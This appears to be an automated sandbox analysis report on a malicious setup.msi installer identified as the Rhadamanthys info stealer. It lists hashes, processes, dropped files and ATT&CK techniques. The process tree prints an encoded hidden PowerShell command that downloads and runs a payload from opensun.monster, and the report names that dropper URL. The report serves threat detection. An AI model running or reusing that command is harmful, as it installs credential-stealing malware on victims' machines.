Resubmissions

23-06-2024 14:14

240623-rj8ymsxdnn 10

17-06-2024 16:58

240617-vg68tazhkm 10

Analysis

  • max time kernel
    111s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-06-2024 16:58

General

  • Target

    __x64___setup___x32__/setup.msi

  • Size

    25.2MB

  • MD5

    9e10d740b32cd15a4fb9a947f911b924

  • SHA1

    6ed60f2f79f986cbf4cc6ab1076522b9c762c272

  • SHA256

    ce35819b8e52f92738534f2b0c0d468bdade96eba64a41915618ab11c04c994a

  • SHA512

    d793f50e6a417a8c75da3a3e809c9cb2d2724d92600e994a90c4198f47937ad462d1682a5277fcb3f0d6648fee2511a2b43c96ff96e8e6a7bec4e461b6bd7a08

  • SSDEEP

    393216:o+OBUMu/xfGNU/6EiKJ5q7cPYALEUEZZ5XXMHjmPaKshz8Rk3KRrREZ78t0N:o+FMSuNCXFYHnbBXHaJ8a3wrREit0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/25053.bs64

Signatures

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 16 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2420
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:560
    • C:\Windows\system32\msiexec.exe
      msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:496
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4548
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding B4EDCB7A5F999D4EBC5031B8042FEA25
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        PID:1472
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\"
        2⤵
        • Executes dropped EXE
        PID:560
      • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
        "C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5112
        • C:\Windows\SysWOW64\explorer.exe
          C:\Windows\SysWOW64\explorer.exe explorer.exe
          3⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4180
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2984
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=780 --field-trial-handle=2276,i,5697607538120380977,9987005253899555344,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:1628
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4180 -ip 4180
        1⤵
          PID:1436

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Discovery

        Query Registry

        1
        T1012

        Peripheral Device Discovery

        1
        T1120

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Config.Msi\e57f698.rbs
          Filesize

          22KB

          MD5

          08a42865154e2a50c71bccf46dd25299

          SHA1

          cd9d91fd718364428cb36a99cdea62ec79770d3a

          SHA256

          a169ac441cf9934474c590b31f53dac8297f9c944f70deb63270adf38caa6957

          SHA512

          0370cd81757ff83eff0daa0d0ae034fd39aed2a8fea60718cfaf09ae94cf9bb36d9f67f9a957fd23b97620c11c24f9ef590bc194513f19fa560e68c5a9dfbf19

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hubvtjk0.coi.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\UnRAR.exe
          Filesize

          494KB

          MD5

          98ccd44353f7bc5bad1bc6ba9ae0cd68

          SHA1

          76a4e5bf8d298800c886d29f85ee629e7726052d

          SHA256

          e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b

          SHA512

          d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f

        • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\ruw9eigh.rar
          Filesize

          376KB

          MD5

          ea08767396983ec8541f755e5dcbb389

          SHA1

          503098b82190f7b7245263e08f07e29ec92d224f

          SHA256

          57eb7c34efeb833930848cd219776a592a659517c157452a841bca2873784b7a

          SHA512

          2f82757a21e39a08d4da29645d3ffaad867560a634600d25e45aa63fa8b07db1e752d47925018b3d323f748e79b76f063004b2eb18649d5fd7e4432f1a28829a

        • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\steamerrorreporter64.exe
          Filesize

          639KB

          MD5

          fd3ce044ac234fdab3df9d7f492c470a

          SHA1

          a74a287d5d82a8071ab36c72b2786342d83a8ef7

          SHA256

          0a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba

          SHA512

          86d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d

        • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\tier0_s64.dll
          Filesize

          386KB

          MD5

          7e60404cfb232a1d3708a9892d020e84

          SHA1

          31328d887bee17641608252fb2f9cd6caf8ba522

          SHA256

          5a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766

          SHA512

          4d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c

        • C:\Users\Admin\AppData\Roaming\Yinanob Coop Aq\PubSurf\vstdlib_s64.dll
          Filesize

          1000KB

          MD5

          e547cefe210d3072f60f4c4cd402d8bb

          SHA1

          17ac4a1184283f98eafe2378bf4908940b63c307

          SHA256

          a970226823fe040895e40b04bfc56b871c0450c2107594f42109f46f48b5e972

          SHA512

          d72b052427cf3434282fd894f66969883c42d360dff1a577514aa1e2f8a98583ff3a63205a3b14bb3d1a5c85a0938509fe343e7830c559d16eaa80331e1febfe

        • C:\Windows\Installer\MSI15BA.tmp
          Filesize

          1.1MB

          MD5

          1a2b237796742c26b11a008d0b175e29

          SHA1

          cfd5affcfb3b6fd407e58dfc7187fad4f186ea18

          SHA256

          81e0df47bcb2b3380fb0fb58b0d673be4ef1b0367fd2b0d80ab8ee292fc8f730

          SHA512

          3135d866bf91f9e09b980dd649582072df1f53eabe4c5ac5d34fff1aeb5b6fa01d38d87fc31de19a0887a910e95309bcf0e7ae54e6e8ed2469feb64da4a4f9e5

        • C:\Windows\Installer\MSI2B67.tmp
          Filesize

          364KB

          MD5

          54d74546c6afe67b3d118c3c477c159a

          SHA1

          957f08beb7e27e657cd83d8ee50388b887935fae

          SHA256

          f9956417af079e428631a6c921b79716d960c3b4917c6b7d17ff3cb945f18611

          SHA512

          d27750b913cc2b7388e9948f42385d0b4124e48335ae7fc0bc6971f4f807dbc9af63fe88675bc440eb42b9a92551bf2d77130b1633ddda90866616b583ae924f

        • C:\Windows\Installer\MSIFA7D.tmp
          Filesize

          738KB

          MD5

          b158d8d605571ea47a238df5ab43dfaa

          SHA1

          bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

          SHA256

          ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

          SHA512

          56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

        • C:\Windows\Installer\e57f695.msi
          Filesize

          25.2MB

          MD5

          9e10d740b32cd15a4fb9a947f911b924

          SHA1

          6ed60f2f79f986cbf4cc6ab1076522b9c762c272

          SHA256

          ce35819b8e52f92738534f2b0c0d468bdade96eba64a41915618ab11c04c994a

          SHA512

          d793f50e6a417a8c75da3a3e809c9cb2d2724d92600e994a90c4198f47937ad462d1682a5277fcb3f0d6648fee2511a2b43c96ff96e8e6a7bec4e461b6bd7a08

        • memory/560-190-0x0000000077750000-0x0000000077965000-memory.dmp
          Filesize

          2.1MB

        • memory/560-188-0x00007FF98FED0000-0x00007FF9900C5000-memory.dmp
          Filesize

          2.0MB

        • memory/560-187-0x00000000025F0000-0x00000000029F0000-memory.dmp
          Filesize

          4.0MB

        • memory/560-185-0x00000000007C0000-0x00000000007C9000-memory.dmp
          Filesize

          36KB

        • memory/2984-156-0x000002C6FE420000-0x000002C6FE442000-memory.dmp
          Filesize

          136KB

        • memory/4180-152-0x0000000000070000-0x0000000000098000-memory.dmp
          Filesize

          160KB

        • memory/4180-179-0x0000000000070000-0x0000000000098000-memory.dmp
          Filesize

          160KB

        • memory/4180-180-0x00000000051B0000-0x00000000055B0000-memory.dmp
          Filesize

          4.0MB

        • memory/4180-181-0x00000000051B0000-0x00000000055B0000-memory.dmp
          Filesize

          4.0MB

        • memory/4180-182-0x00007FF98FED0000-0x00007FF9900C5000-memory.dmp
          Filesize

          2.0MB

        • memory/4180-184-0x0000000077750000-0x0000000077965000-memory.dmp
          Filesize

          2.1MB

        • memory/4180-154-0x0000000000070000-0x0000000000098000-memory.dmp
          Filesize

          160KB

        • memory/4180-153-0x0000000000070000-0x0000000000098000-memory.dmp
          Filesize

          160KB

        • memory/5112-149-0x0000021F4C080000-0x0000021F4C0A5000-memory.dmp
          Filesize

          148KB

        • memory/5112-148-0x0000021F4C070000-0x0000021F4C071000-memory.dmp
          Filesize

          4KB